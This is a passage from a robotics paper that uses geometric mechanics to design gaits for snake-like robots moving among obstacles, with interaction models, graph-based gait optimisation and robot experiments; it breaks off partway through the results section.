Most limbless robots use traveling-wave gait templates for locomotion where sinusoidal oscillation of body joint bending propagates from head to tail under constant amplitude (i.e., phase modulation) [15, 8, 32]. To the best of our knowledge, most OAL work has focused on force-feedback decentralized adaptation of traveling-wave gait templates to interact with obstacles, where the choices of gait templates are often pre Fig. 1: **A robophysical and theoretical model of obstacle aided locomotion** (a) Top view of the robophysical model navigating among multiple obstacles. (b) The theoretical model for obstacle aided locomotion with (_left_) a single obstacle and (_right_) multiple obstacles. determined [19, 38, 40]. In other words, there is a lack of gait templates designed (other than traveling-wave) specifically for obstacle aided locomotion. Geometric mechanics (GM) is a framework for gait design. GM was developed to study swimming in obstacle-free low Reynolds number fluids [29, 43]. Recent work has shown that GM can also offer insights in gait design in terrestrial contexts (e.g., granular media and frictional ground) where frictional forces dominate over inertial forces [4, 6]. In GM the motion of a locomotion system is separated into a shape space (the internal joint angle space) and a position space (position and orientation of locomotor in the world frame). By establishing the mapping between velocities in shape and position spaces, GM offers tools that allow us to visually analyze, design and optimize gaits [14]. Although GM has produced a number of highly effective gait templates, prior work in GM has been limited to obstacle-free environments. In this paper, we seek to expand the scope of GM to obstacle-rich2 environments. Challenges of extending GM to design gait templates in heterogeneous environments include but are not limited to (1) modeling the interaction between obstacle and robot, (2) mapping the presence of obstacle from position space to constraints in shape space, and (3) identifying whether the obstacle (at a given position relative to the robot) is beneficial. We establish a new physical robot-obstacle interaction model integrating the presence of an obstacle into the GM framework. In doing so, we then convert the gait design problem into a discrete optimization problem in graphs. As a result, we identify elliptical gait templates which combine both amplitude modulation and phase modulation, specialized for navigating sparsely-distributed obstacle-rich environments. Further, we confirm that traveling-wave gait templates are specialized for densely-distributed obstacle-rich environments, which is consistent with prior works [19, 38]. We verify our results using a robophysical model (Fig. 1). Footnote 2: Here, we consider obstacles as vertical posts randomly distributed on flat terrains. ## II Geometric mechanics In this subsection, we provide an overview of the geometric tools that undergird the analysis framework introduced in this paper. For a more detailed and comprehensive review, we refer readers to [3, 12, 24, 45]. 
### _Kinematic Reconstruction Equation_ In systems where inertial effects are negligible, the equations of motion ([24]) can be approximated as: \[\mathbf{\xi}=\mathbf{A}_{r}(\mathbf{r})\dot{\mathbf{r}}, \tag{1}\] where \(\mathbf{\xi}=[\xi_{x},\xi_{y},\xi_{\theta}]\) denotes the body velocity in the forward, lateral, and rotational directions; \(\mathbf{r}\) denotes the internal shape variables (joint angles); \(\mathbf{A}_{r}(\mathbf{r})\) is the local connection matrix, which encodes environmental constraints and the conservation of momentum. The analysis and visualization power of geometric mechanics is particularly effective when the shape variable is 2-dimensional, i.e., \(\mathbf{r}\in\mathbb{R}^{2}\). In applications where there are more than 2 joints (e.g. \(N\) degrees-of-freedom), we use two shape basis functions [11] to reduce the dimensionality of the system: \[\mathbf{r}=[\mathbf{\beta}_{1},\ \mathbf{\beta}_{2}]\,\mathbf{w},\ \ \mathbf{\xi}=\mathbf{A}_{r}\big{(}\mathbf{r}(\mathbf{w})\big{)}\dot{\mathbf{w}}=\mathbf{A}(\mathbf{w})\dot{\mathbf{w}} \tag{2}\] where \(\mathbf{\beta}_{1},\ \mathbf{\beta}_{2}\in\mathbb{R}^{N}\) are shape basis functions, \(\mathbf{w}\in\mathbb{R}^{2}\) is the reduced shape variable, and \(\mathbf{A}\) is the local connection matrix expressed with respect to the reduced shape variables. In applications to limbless robots with \(N\) joints, the shape basis functions are often chosen to be: \[\mathbf{\beta}_{1}(i)=\sin\bigg{(}2\pi f_{s}\frac{i}{N-1}\bigg{)},\ \ \mathbf{\beta}_{2}(i)=\cos\bigg{(}2\pi f_{s}\frac{i}{N-1}\bigg{)} \tag{3}\] where \(f_{s}\) is the number of spatial waves and \(i\) denotes the joint index. ### _Numerical Derivation of the Local Connection Matrix_ The local connection matrix \(\mathbf{A}\) can be numerically derived using resistive force theory (RFT) to model the ground reaction force [18, 34, 44]. Specifically, the ground reaction force (GRF) experienced by the locomotor is the sum of the GRF experienced by each body segment. RFT decomposes the GRF experienced by a body segment of a locomotor into two components: \(\mathbf{F}_{\parallel}\) and \(\mathbf{F}_{\perp}\), the reaction forces along the directions parallel and perpendicular to the body segment, respectively. From the geometry and physics of the GRF, the reaction forces on each segment can be calculated from the body velocity \(\mathbf{\xi}\), reduced body shape \(\mathbf{w}\), and reduced shape velocity \(\dot{\mathbf{w}}\) [31, 26]. Fig. 2: **Forward velocity integral and Lie bracket effect** From left to right: the shape space, the height function (\(-\mathbf{dA}+[\mathbf{A_{1}},\ \mathbf{A_{2}}]\)), and the forward velocity integral (\(-\mathbf{dA}\)). We compared two wave numbers: (a) \(f_{s}=1\) and (b) \(f_{s}=0.5\). In both cases, the height function has nearly zero values over the shape space. Notably, for \(f_{s}=1\), neither the forward velocity integral nor the Lie bracket effect has a significant contribution to forward displacement. In contrast, when \(f_{s}=0.5\), the forward velocity integral and the Lie bracket effect have non-negligible, opposite contributions to forward displacement. The color bar scale and axes labeling are identical in all panels. Assuming quasi-static motion, we consider the total net force applied to the system to be zero at any instant in time: \[\mathbf{F}=\sum_{i=1}^{N}\left[\mathbf{F}_{\parallel}^{i}(\mathbf{\xi},\mathbf{w},\dot{\mathbf{w}})+\mathbf{F}_{\perp}^{i}\left(\mathbf{\xi},\mathbf{w},\dot{\mathbf{w}}\right)\right]=0.
\tag{4}\] At a given body shape \(\mathbf{w}\), Eq.(4) connects the shape velocity \(\dot{\mathbf{w}}\) to the body velocity \(\mathbf{\xi}\). Therefore, by the implicit function theorem and the linearization process, we can numerically derive the local connection matrix \(\mathbf{A}(\mathbf{w})\). In our implementation, we compute the solution of Eq.(4) using the MATLAB function _fsolve_. ### _Connection Vector Fields and Height Functions_ Each row of the local connection matrix \(\mathbf{A}\) corresponds to a component direction of the body velocity. Each row of the local connection matrix, over the shape space, then forms a connection vector field. In this way, the body velocities in the forward, lateral, and rotational directions are computed as the dot product of the connection vector fields and the reduced shape velocity \(\dot{\mathbf{w}}\). The displacement along the gait path \(\partial\phi\) can be obtained by integrating the ordinary differential equation below [13]: \[g(T)=\int_{\partial\phi}T_{e}L_{g(\mathbf{w})}\mathbf{A}(\mathbf{w})\mathrm{d}\mathbf{w}, \tag{5}\] where \(g(\mathbf{w})=[x(\mathbf{w}),y(\mathbf{w}),\alpha(\mathbf{w})]\) represents the position and rotation of the body frame viewed in the world frame at position \(\mathbf{w}\); \(T\) is the time period of a gait cycle; and \(T_{e}L_{g}\) is the differential at the identity of the left multiplication map \(L_{g}\colon SE(2)\to SE(2)\), i.e. \[T_{e}L_{g}=\begin{bmatrix}\cos(\alpha)&-\sin(\alpha)&0\\ \sin(\alpha)&\cos(\alpha)&0\\ 0&0&1\end{bmatrix}.\] The group element \(g=(x,y,\theta)\in\mathrm{SE}(2)\) represents the position and rotation of the center of mass of the robot. Hence \(g(T)=[\Delta x,\Delta y,\Delta\theta]\) computes the translation and rotation of the body frame (w.r.t. the world frame) in one gait cycle. The forward velocity integral can therefore provide a first-order approximation to Eq. 5: \[\begin{bmatrix}\Delta x\\ \Delta y\\ \Delta\theta\end{bmatrix}\approx\int_{\partial\phi}\mathbf{A}(\mathbf{w})\mathrm{d}\mathbf{w}=\int_{\partial\phi}\begin{bmatrix}\mathbf{A}^{x}(\mathbf{w})\\ \mathbf{A}^{y}(\mathbf{w})\\ \mathbf{A}^{\theta}(\mathbf{w})\end{bmatrix}\mathrm{d}\mathbf{w}, \tag{6}\] where \(\mathbf{A}^{x},\mathbf{A}^{y},\mathbf{A}^{\theta}\) are the three rows of the local connection, respectively. According to Stokes' Theorem, the line integral along a closed curve \(\partial\phi\) is equal to the surface integral of the curl of \(\mathbf{A}(\mathbf{w})\) over the surface enclosed by \(\partial\phi\): \[\int_{\partial\phi}\mathbf{A}(\mathbf{w})\mathrm{d}\mathbf{w}=\iint_{\phi}-\mathrm{d}\mathbf{A}(\mathbf{w})\mathrm{d}\mathbf{w}_{1}\mathrm{d}\mathbf{w}_{2}, \tag{7}\] where \(\phi\) denotes the surface enclosed by \(\partial\phi\) and \(-\mathrm{d}\mathbf{A}(\mathbf{w})\) denotes the curl of the connection vector field. Note that in the simplification from Eq. 5 to Eq. 6, the forward displacement is approximated by the direct integration of the forward speed. In reality, the combination of lateral and rotational velocities can lead to net translation in the forward direction. For example, a car undergoing parallel parking has zero instantaneous lateral velocity but can achieve a finite lateral displacement with properly sequenced forward and rotational velocities. Such an effect is known as the Lie bracket effect [13] and is neglected in Eq. 6. The first-order Lie bracket effect can be compensated for by introducing a Lie bracket correction term [13].
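As a concrete illustration of how Eq. (6) is used in practice (a minimal sketch of our own, not the paper's MATLAB implementation; the connection `A_func` is a user-supplied placeholder, e.g. obtained numerically from the RFT force balance in Eq. (4)), the first-order displacement of a circular gait in the reduced shape space can be estimated by a discrete line integral:

```python
import numpy as np

def gait_displacement(A_func, amplitude=1.0, samples=400):
    """First-order displacement of Eq. (6): integrate A(w) dw around a circular gait path
    w(t) = amplitude * (cos t, sin t); the Lie bracket correction discussed next is neglected."""
    dt = 2.0 * np.pi / samples
    disp = np.zeros(3)                           # [dx, dy, dtheta]
    for t in np.linspace(0.0, 2.0 * np.pi, samples, endpoint=False):
        w = amplitude * np.array([np.cos(t), np.sin(t)])
        dw = amplitude * np.array([-np.sin(t), np.cos(t)]) * dt
        disp += A_func(w) @ dw                   # A(w) is a 3x2 matrix at shape w
    return disp

# Toy usage with a hypothetical connection (illustration only):
# print(gait_displacement(lambda w: np.array([[0.0, w[0]], [0.0, 0.0], [0.0, 0.0]])))
```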
Higher order Lie bracket effects can be minimized by properly choosing the body frame [22]. With the Lie bracket correction term, we can better approximate the net forward displacement [13]: \[g(T)=\iint_{\phi}\left(\underbrace{-\mathrm{d}\mathbf{A}(\mathbf{w})+\left[\mathbf{A_{1} },\ \mathbf{A_{2}}\right]}_{D\mathbf{A}(\mathbf{w})}\right)\,\mathrm{d}w_{1}\mathrm{d}w_{2} \tag{8}\] The three rows of \(D\mathbf{A}(\mathbf{w})\) can thus produce three height functions in the forward, lateral, and rotational directions respectively. ### _Lie bracket effect for OAL_ Limbless locomotors have limited mobility on hard ground [20, 5, 1]. From a geometric perspective, we posit that some symmetry exists to limit the mobility of limbless locomotion on hard ground. The presence of obstacles can break such symmetry and therefore facilitate effective locomotion. To explore such symmetry breaking, in Fig. 2, we compared the height function for limbless robot with different shape basis functions (\(f_{s}=\{1,\ 0.5\}\) in Eq. 3). In both cases, the height function \(D\mathbf{A}(\mathbf{w})\) is almost constantly zero over the entire shape space, indicating that the robot has almost negligible speed regardless of the choice of gait (Fig. 2). When we Fig. 3: **Lie bracket effect** (a) Theoretical prediction of forward velocity integral by calculating the Frobenius Norm of \(\mathbf{A}(\mathbf{w})\) for a range of spatial frequencies (\(f_{s}\)). (b) Experimental verification. We used a pair of smooth parallel walls to restrict the robot’s body velocity only in forward direction. We tested the locomotion performance for gaits with different spatial frequencies. Backwards locomotion is observed with its peak at \(f_{s}=0.5\), which is consistent with our theoretical predictions. look carefully at different components of the height function, we notice that robots with 1 wave (\(f_{s}=1\)) and 0.5 waves (\(f_{s}=0.5\)) exhibit distinct properties. On the one hand, for the robot with 1 wave, neither the forward velocity integral nor the Lie bracket effect can lead to significant translation (Fig. 2.a). On the other hand, for the robot with 0.5 waves, the forward velocity integral and the Lie bracket effect have the same magnitude but opposite direction contribution to locomotion (Fig. 2.b). This observation indicates lateral forces (likely from obstacles) can also contribute to forward velocities when the limbless locomotor is operating at appropriate spatial wave numbers \(f_{s}\). To determine the \(f_{s}\) that can benefit the most from lateral forces, we calculated the Frobenius norm3 of \(\mathbf{dA}(\mathbf{w})\) for a range of wave numbers (Fig. 3). From the geometric analysis, we predict that wave number \(\approx\) 0.5 will have the highest possibility to benefit from lateral forces, and specialized in OAL. Footnote 3: We chose Frobenius norm to approximate the magnitude of the vector field ## III Modeling Interaction with One Obstacle ### _Geometric Model_ In the previous section, we introduced a derivation of the local connection vector field in homogeneous environments. In heterogeneous environments, the interactions with obstacles can often lead to changes in force and torque balance, and thus changes in the connection vector field. In this section, we establish a new method to numerically calculate the connection vector field, respecting the interactions between the robot and obstacles in its environment. 
Note that to simplify our analysis, we assume that the friction between the robot and the obstacle is negligible [19]. Consider one obstacle in contact with the robot. Index \(i_{0}\) denotes the link of contact. We further assume that \(i_{0}\) does not change in each obstacle-interaction instance. This assumption is later justified in robot experiments. For simplicity, our analysis below assumes that the obstacle resides on the left hand side (LHS) of link \(i_{0}\). The analysis for the right hand side (RHS) obstacle will be symmetric to our analysis below. Existence of the obstacle will restrict the lateral body velocity \(\xi_{y}\geq 0\). In this way, there are two mutually exclusive conditions for the lateral body velocity: #### Iii-A1 \(\xi_{y}=0\) In this case, the robot will remain in contact with the obstacle. If we assume that the friction between the robot and the obstacle is negligible, then the net force from obstacle to robot (\(F\)) will align with the lateral direction (\(y^{\prime}_{i}\)) of the body frame in link \(i_{0}\). In the body frame of link \(i_{0}\), the interaction between the obstacle and the robot only contributes in the lateral direction. In other words, the force and torque balance in forward and rotational directions are independent from the interactions with obstacles. In this way, we can rewrite Eq. 4 into: \[\mathbf{F}=\sum_{i}\left(\mathbf{F}^{i}_{||}\begin{pmatrix}\xi_{x}\\ 0\\ \xi_{\theta}\end{pmatrix},\mathbf{w},\dot{\mathbf{w}})+\mathbf{F}^{i}_{\perp}\begin{pmatrix} \xi_{x}\\ 0\\ \xi_{\theta}\end{pmatrix},\mathbf{w},\dot{\mathbf{w}})\right)=\begin{pmatrix}0\\ F\\ 0\end{pmatrix}. \tag{9}\] In Eq. 9, there are two variables and two equality constraints, allowing us to determine the local connection vector field. #### Iii-A2 \(\xi_{y}>0\) In this case, the robot will leave the obstacle. In this way, original force and torque balance in Eq. 4 are still valid to determine the local connection vector field. ### _Inequality Constraints_ With the two mutually exclusive interactions conditions, it is thus important to establish a criterion to evaluate the direction of \(\xi_{y}\). We first explore the conditions where the robot leaves the obstacle. Specifically, from the equation of motion (Eq. 2), the lateral velocity \(\xi_{y}\) can be approximated by: \[\xi_{y}=\mathbf{A}_{y}(\mathbf{w})\dot{\mathbf{w}}, \tag{10}\] where \(\mathbf{A}_{y}(\mathbf{w})\) is the second row of the local connection matrix \(\mathbf{A}(\mathbf{w})\). On the one hand, if \(\mathbf{A}_{y}(\mathbf{w})\dot{\mathbf{w}}>0\), the robot will leave the Fig. 4: **Modeling interactions between robot and obstacles** (i) (_Left_) The vector field \(V_{1}\) assuming the obstacle has interactions with the head link (\(i_{0}=1\)). (_Right_) Force relationship illustrations for interactions between robot and obstacle. (ii) (_Left_) The vector field \(V_{2}\) assuming the obstacle has interactions with the head link (\(i_{0}=1\)). (_Right_) The two conditions in Sec. III. (iii) OAL with multiple obstacles. Three conditions are compared. Note that in condition (c), obstacles constrain the lateral and rotational oscillation of robot’s central body axis (blue arrow). obstacle, which is consistent with our assumed condition. In this case, Eq. 10 is valid in accordance with Eq. 4, where we use condition (2) to determine the local connection matrix. 
On the other hand, if \(\mathbf{A}_{y}(\mathbf{w})\dot{\mathbf{w}}\leq 0\), the robot will keep engaging with the obstacle, which contradicts our assumption. In this case, Eq. 10 is not valid, and we will use Eq. 9 and condition (1) to determine the local connection matrix. ### _Gait Design_ With the above model, we can now design gaits for limbless robots in obstacle-rich environments. With the optimal gait, the robot should take best advantage of each obstacle interaction and leave the obstacle only when necessary. Consider a joint angle limit of \(\theta_{m}\) (\(w_{1},w_{2}\in[-\theta_{m},\theta_{m}]\)). Let \(\Phi=\{\phi:[0,T]\rightarrow[-\theta,\theta]\times[-\theta,\theta]\}\) be the collection of all paths in the shape space; let \(V_{1}\) be the local connection vector field generated from condition 1 (Eq. 9); and \(V_{2}=\mathbf{A}_{y}(\mathbf{w})\). The gait optimization problem becomes a line integral subject to direction constraints: **Problem 1**.: _Find the path \(\phi\in\Phi\), subject to: \(\frac{d\phi(t)}{dt}\cdot V_{2}\Big{(}\phi(t)\Big{)}>0\ \forall\ t\in[0,T]\), such that \(\int_{0}^{T}\frac{d\phi(t)}{dt}\cdot V_{1}\Big{(}\phi(t)\Big{)}\mathrm{d}t\) is maximized._ Assuming \(i_{0}=1\), we show an example of \(V_{1}\) and \(V_{2}\) in Fig. 4. ### _Numerical Optimization_ In practice, we discretize the shape space into an \((n+1)\times(n+1)\) lattice grid, where \(n\) is a suitable positive integer. The values of \(V_{1}\) and \(V_{2}\) are then numerically calculated at the grid points: \(V_{i}(x,y)=\left[V_{i,1}(x,y),V_{i,2}(x,y)\right]\) where \(i=1,2\) and \((x,y)\) is a discretized element in the shape space. We optimize \(\phi\) among lattice paths with horizontal and vertical line segments. \(V_{2}\) is one part of the vector fields for locomotion in an isotropic environment; thus it is reasonable to assume that \(V_{2}\) is a conservative vector field [20, 5, 1]. Then we can compute a potential function \(P(x,y)\) defined on the shape space such that \(V_{2}\) is the gradient of \(P(x,y)\). We consider a weighted directed graph \(G=(U,A)\), where the set of vertices \(U\) consists of the \((n+1)\times(n+1)\) lattice points4. In this way, at each vertex \(u=(x,y)\in U\), there are 4 adjacent vertices: \(\{(x\pm 1,y),(x,y\pm 1)\}\). The arcs are constructed in the following way: Footnote 4: We chose the letter \(U\) (instead of \(V\)) to represent collections of vertices to avoid notation confusion with \(V_{1,2}\) as in vector fields. _a) :_ If \(P(x+1,y)>P(x,y)\), then we add an arc from \((x,y)\) to \((x+1,y)\) with weight \(V_{1,1}(x,y)\) to \(A\); _b) :_ If \(P(x-1,y)>P(x,y)\), then we add an arc from \((x,y)\) to \((x-1,y)\) with weight \(V_{1,1}(x,y)\) to \(A\); _c) :_ If \(P(x,y+1)>P(x,y)\), then we add an arc from \((x,y)\) to \((x,y+1)\) with weight \(V_{1,2}(x,y)\) to \(A\); _d) :_ If \(P(x,y-1)>P(x,y)\), then we add an arc from \((x,y)\) to \((x,y-1)\) with weight \(V_{1,2}(x,y)\) to \(A\); Thus, the existence of an arc \(a_{ij}\in A\) (from vertex \(u_{i}\) to \(u_{j}\), \(u_{i},u_{j}\in U\)) indicates that the move from \(u_{i}\) to \(u_{j}\) has a positive dot product with \(V_{2}\). The weight of \(a_{ij}\) denotes the line integral from \(u_{i}\) to \(u_{j}\) along \(V_{1}\). **Lemma 2**.: \(G\) _is a directed acyclic graph (DAG)._ Proof: Let \(C\) be a directed cycle in \(G\). From our previous assumptions, every arc in \(C\) has a positive dot product with \(V_{2}\).
### _Numerical Optimization_

In practice, we discretize the shape space into an \((n+1)\times(n+1)\) lattice grid, where \(n\) is a suitable positive integer. The values of \(V_{1}\) and \(V_{2}\) are then numerically calculated at the grid points: \(V_{i}(x,y)=\left[V_{i,1}(x,y),V_{i,2}(x,y)\right]\), where \(i=1,2\) and \((x,y)\) is a discretized element of the shape space. We optimize \(\phi\) among lattice paths composed of horizontal and vertical line segments. \(V_{2}\) is one component of the vector fields for locomotion in an isotropic environment; it is therefore reasonable to assume that \(V_{2}\) is a conservative vector field [20, 5, 1]. We can then compute a potential function \(P(x,y)\) on the shape space such that \(V_{2}\) is the gradient of \(P(x,y)\). We consider a weighted directed graph \(G=(U,A)\), where the set of vertices \(U\) consists of the \((n+1)\times(n+1)\) lattice points\({}^{4}\). At each vertex \(u=(x,y)\in U\) there are four adjacent vertices: \(\{(x\pm 1,y),(x,y\pm 1)\}\). The arcs are constructed in the following way:

Footnote 4: We chose the letter \(U\) (instead of \(V\)) to represent collections of vertices to avoid notation confusion with \(V_{1,2}\) as in vector fields.

_a)_ If \(P(x+1,y)>P(x,y)\), then we add an arc from \((x,y)\) to \((x+1,y)\) with weight \(V_{1,1}(x,y)\) to \(A\);

_b)_ If \(P(x-1,y)>P(x,y)\), then we add an arc from \((x,y)\) to \((x-1,y)\) with weight \(V_{1,1}(x,y)\) to \(A\);

_c)_ If \(P(x,y+1)>P(x,y)\), then we add an arc from \((x,y)\) to \((x,y+1)\) with weight \(V_{1,2}(x,y)\) to \(A\);

_d)_ If \(P(x,y-1)>P(x,y)\), then we add an arc from \((x,y)\) to \((x,y-1)\) with weight \(V_{1,2}(x,y)\) to \(A\).

Thus, the existence of an arc \(a_{ij}\in A\) (from vertex \(u_{i}\) to \(u_{j}\), with \(u_{i},u_{j}\in U\)) indicates that the move from \(u_{i}\) to \(u_{j}\) has a positive dot product with \(V_{2}\). The weight of \(a_{ij}\) is the line integral from \(u_{i}\) to \(u_{j}\) along \(V_{1}\).

**Lemma 2**. \(G\) _is a directed acyclic graph (DAG)._

Proof: Suppose, for contradiction, that \(C\) is a directed cycle in \(G\). By construction, every arc in \(C\) has a positive dot product with \(V_{2}\), so the sum of the dot products of the arcs in \(C\) with \(V_{2}\) is strictly positive. This implies the existence of a closed path with a strictly positive line integral in a conservative vector field (\(V_{2}\)), which contradicts our assumption that \(V_{2}\) is conservative. Therefore, there is no directed cycle in \(G\).

With the aforementioned notation, a discretized version of Problem 1 becomes:

**Problem 3**. _Find a simple directed path in \(G=(U,A)\) with maximal weight._

It is well known that Problem 3 in a DAG admits a linear-time algorithm when the starting point is fixed [33, p. 661]. We can therefore run this algorithm once for each vertex in \(U\) to solve Problem 3. Since \(|U|=(n+1)^{2}\), our algorithm has time complexity \(O(n^{4})\). We implemented this algorithm in MATLAB and found optimal paths in our lattice grid.
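For concreteness, a minimal Python sketch of the graph construction and of the fixed-source longest-path computation on the resulting DAG is given below; the potential \(P\) and the field \(V_{1}\) are hypothetical placeholders for the numerically computed quantities, and the per-arc weights follow the construction in _a)_ to _d)_ above.

```python
import numpy as np

n = 10                                   # lattice resolution (placeholder)
xs = np.linspace(-1.0, 1.0, n + 1)

# Hypothetical placeholders for the computed potential P (with V2 = grad P)
# and the contact-modified field V1 = [V11, V12] sampled on the lattice.
P   = np.add.outer(0.2 * np.sin(np.pi * xs), xs)        # P(x, y)
V11 = np.outer(np.cos(xs), np.ones(n + 1))               # V_{1,1}(x, y)
V12 = np.outer(np.ones(n + 1), -0.5 * np.sin(xs))        # V_{1,2}(x, y)

# Build the arcs a)-d): move only toward increasing P, weighting horizontal
# moves by V11 and vertical moves by V12.
arcs = {}   # arcs[u] = list of (v, weight)
for i in range(n + 1):
    for j in range(n + 1):
        out = []
        if i + 1 <= n and P[i + 1, j] > P[i, j]: out.append(((i + 1, j), V11[i, j]))
        if i - 1 >= 0 and P[i - 1, j] > P[i, j]: out.append(((i - 1, j), V11[i, j]))
        if j + 1 <= n and P[i, j + 1] > P[i, j]: out.append(((i, j + 1), V12[i, j]))
        if j - 1 >= 0 and P[i, j - 1] > P[i, j]: out.append(((i, j - 1), V12[i, j]))
        arcs[(i, j)] = out

def longest_path_from(src):
    """Maximum-weight directed path starting at src, via memoized DFS.

    The graph is acyclic by construction (P strictly increases along every
    arc), so the recursion terminates; for large n an explicit topological
    order would avoid deep recursion.
    """
    best = {}
    def dfs(u):
        if u not in best:
            best[u] = 0.0
            for v, w in arcs[u]:
                best[u] = max(best[u], w + dfs(v))
        return best[u]
    return dfs(src)

# Run the fixed-source algorithm from every vertex, as in the text.
opt = max(longest_path_from(u) for u in arcs)
print("best path weight (model units):", opt)
```

This mirrors the structure of the MATLAB implementation described above: the memoized search from a fixed source is linear in the size of the DAG, and repeating it from every vertex gives the overall \(O(n^{4})\) bound.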
### _Gait Identification_

From the algorithms introduced in Sec. III-D, we solve Problem 1 and identify the effective gait paths \(\phi_{LHS}\) with the link of contact varying from 1 (head) to 3 (mid-body) in Fig. 5a. We define a gait path to be effective if it can cause a net displacement greater than 0.1 body length (BL). Note that \(\phi_{LHS}\) (colored red) denotes gait paths designated for the robot interacting with an obstacle on the left-hand side. From symmetry, we can identify \(\phi_{RHS}\) for an obstacle on the right-hand side (colored blue). Note that no gait path can lead to a displacement higher than 0.1 BL when interacting with obstacles on mid-body links (\(i_{0}=3\)); in Fig. 5a (bottom), we illustrate the optimal gait path, which causes a displacement of 0.06 BL.

Fig. 5: **Identification of gait templates** (a) Collection of effective OAL gaits for (_top_) \(i_{0}=1\), (_mid_) \(i_{0}=2\), and (_bottom_) \(i_{0}=3\). We consider a gait to be effective if it can produce displacement greater than 0.1 BL (body length). Note that there is no effective gait for \(i_{0}=3\); we illustrate the optimal gait with \(D=0.05\) for \(i_{0}=3\). (b) Height function for OAL among densely-distributed obstacles. (c) Parameter variation. (_Top_) An illustration of ellipse eccentricity variation by manipulating \(\phi\). (_Bottom_) An illustration of ellipse orientation variation by manipulating \(\theta\).

From Fig. 5a, we notice that the number of effective gait paths decreases as the link of contact transitions from the head to the mid-body links. Further, a properly designed gait path can cause a displacement of up to 0.35 BL per cycle when interacting with the head link, whereas it can only cause 0.12 and 0.06 BL when \(i_{0}\) changes to 2 and 3, respectively. Therefore, our results indicate that it is preferable to interact with obstacles using the head link rather than the mid-body links. We further observe from Fig. 5a (top) that almost all effective gait paths emerge as (at least a part of) elliptical paths. To quantify this observation, we fit the collection of effective gaits with an oriented ellipse. An ellipse with a flatness (defined as the ratio of the short axis to the long axis) of around 0.5 can reasonably fit the effective gait paths. The ellipse is oriented at an angle of \(\pi/4\) with respect to the horizontal axis.

## IV Modeling Interaction with Multiple Obstacles

Now we consider multiple obstacles in contact with the robot. Similar to our analysis before, there are three conditions with respect to the status of the robot leaving or engaging obstacles:

_(a) Robot interacts with only one obstacle._ In this case, the robot remains in contact with only one of the obstacles. This condition is similar to condition (1) in Sec. III.

_(b) Robot leaves all obstacles._ In this case, the robot leaves all obstacles, which is similar to condition (2) in Sec. III.

_(c) Robot interacts with multiple obstacles._ In this case, the robot remains in contact with multiple obstacles. As illustrated in Fig. 4c, the presence of multiple obstacles restricts the lateral and rotational oscillation of the robot's central body axis (assuming the friction is negligible [19]). The definition of the central body axis frame can be found in [11, 31]. In other words, in the body reference frame of the central body axis, we have:

\[\mathbf{F}=\sum_{i}\left(\mathbf{F}^{i}_{||}\Big(\begin{pmatrix}\xi_{x}\\ 0\\ 0\end{pmatrix},\mathbf{w},\dot{\mathbf{w}}\Big)+\mathbf{F}^{i}_{\perp}\Big(\begin{pmatrix}\xi_{x}\\ 0\\ 0\end{pmatrix},\mathbf{w},\dot{\mathbf{w}}\Big)\right)=\begin{pmatrix}0\\ F_{y}\\ F_{\tau}\end{pmatrix}. \tag{11}\]

In Eq. 11, there is only one variable and one equality constraint, allowing us to determine the local connection vector field. Note that determining which condition applies when the robot is in contact with multiple obstacles can be challenging, and likely requires sensing and compliance, as indicated in prior work [38, 21]. However, consider the case where the obstacles are so densely distributed that the robot will inevitably interact with multiple obstacles. In this case, we can simply assume that condition (c) is always valid and calculate the height functions to determine the optimal gaits. We illustrate the height function in Fig. 5b. We notice that a traveling-wave gait path emerges as an optimal gait in environments with densely-packed obstacles.

## V Robophysical Model

In robophysical experiments, we used a limbless robot composed of 11 identical rotary joints (Dynamixel AX-12a motors) arranged in an alternating pitch-yaw configuration. The gaits are executed by controlling the positions of the joints to follow a sequence of joint angle commands. Note that for 2D in-plane motion, we only command the odd (yaw) joints to move, while the even (pitch) joint angles are held at zero. For each gait tested, we repeat the experiment at least six times. In each trial, we commanded the robot to execute three cycles of the gait. The motion of the robot is tracked by an OptiTrack motion capture system at 120 FPS, with eight reflective markers affixed along the midline of the robot.

Fig. 6: **Minimal obstacle spacing for effective OAL** The robot executes effective OAL gaits through interaction with an obstacle; however, the translation (\(D=0.15\pm 0.03\) BL) is not sufficient to reach the next obstacle (spacing \(s\sim 0.5\) BL). The robot therefore gets stuck in the gap between two obstacles.

## VI Results

### _Shape basis function optimization for OAL_

To verify our prediction on the shape basis function for OAL, we conducted robophysical experiments using parallel walls. As shown in Fig. 3, the robot was confined between two parallel smooth walls with a spacing of 0.3 body lengths. The interactions between the robot and the walls then restricted the velocity of the robot to the forward direction. Thus, the average speed of the robot between the parallel walls closely resembles the forward velocity integral from our geometric mechanics analysis. Interestingly, the robot exhibits negative forward displacement, in agreement with the predictions from the forward velocity integral. Further, we noticed that the highest backward speed occurs at \(f_{s}=0.5\), also in agreement with our theoretical predictions.
Therefore, the robophysical experiments verified our prediction that lateral forces can also contribute to forward velocities via Lie bracket effects. In most cases, the interaction between obstacles and the robot is predominantly in the lateral direction [19]. We thus chose \(f_{s}=0.5\) in our later analysis.

### _Minimal obstacle spacing for effective OAL_

We investigate the minimal obstacle spacing for effective OAL. From our analysis in Sec. III, we predicted that, with proper coordination, the interaction between a robot and a (single) obstacle can cause a displacement of up to 0.35 BL. Note that the value 0.35 is computed based on the robot morphology and our choice of shape basis function. In other words, there exists an upper bound on how much a single obstacle can contribute to robot OAL. If the obstacle spacing is greater than this bound, the robot will likely be unable to reach the next surrounding obstacle. To verify this prediction, we tested the robot's OAL performance in obstacle-rich environments with spacing greater than 0.35 BL. We notice that while OAL gaits can cause some finite displacement through the interaction with the first obstacle, this translation is not sufficient to reach the next obstacle (Fig. 6 and SI video). In this way, the robot gets "stuck" in the gap between two obstacles.

### _OAL with sparsely distributed obstacles_

From our framework, we predicted that elliptical gaits have the best performance among sparsely distributed obstacles. To test this prediction, we constructed a sparsely-distributed obstacle-rich environment, with obstacles randomly positioned in the track (Fig. 7). We then conducted robophysical experiments and evaluated the OAL performance of various gaits.

#### VI-C1 Varying ellipse eccentricity

